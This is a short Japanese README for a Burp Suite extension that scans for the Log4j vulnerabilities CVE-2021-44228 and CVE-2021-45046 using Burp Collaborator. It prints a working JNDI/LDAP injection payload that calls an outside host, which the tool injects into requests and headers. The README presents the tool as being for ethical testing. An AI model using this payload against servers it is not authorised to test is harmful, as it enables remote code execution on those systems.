
Log4jの脆弱性CVE-2021-44228およびCVE-2021-45046を特定するためのBurp Active Scan拡張機能
このBurp Suite Active Scanner拡張機能は、Apache Log4jのCVE-2021-44228およびCVE-2021-45046の脆弱性への悪用を検証します。
この拡張機能は、問題を検証するためにBurp Collaboratorを使用します。
このモジュールのチェックのみを実行したい場合は、extensions-only.json プロファイルをインポートし、アクティブスキャンプロファイルとして選択できます。
アクティブスキャン中、この拡張機能では以下の挿入ポイントが試行されます:
各挿入ポイントで、リクエストには以下のペイロードが注入されます:
${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}
さらに、この拡張機能は、headers で有効化されている(コメントアウトされていない行の)多くのヘッダーを追加します。 これらのヘッダーは、それぞれ別々のリクエストで1つずつ注入されます。
このプロジェクトは、教育および倫理的なテスト目的のみで作成されています。事前の相互同意なしにターゲットを攻撃するためのLog4Shell-active-scannerの使用は違法です。適用される地域、州、連邦のすべての法律を遵守する責任はエンドユーザーにあります。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。
このプロジェクトはMITライセンスの下でライセンスされています。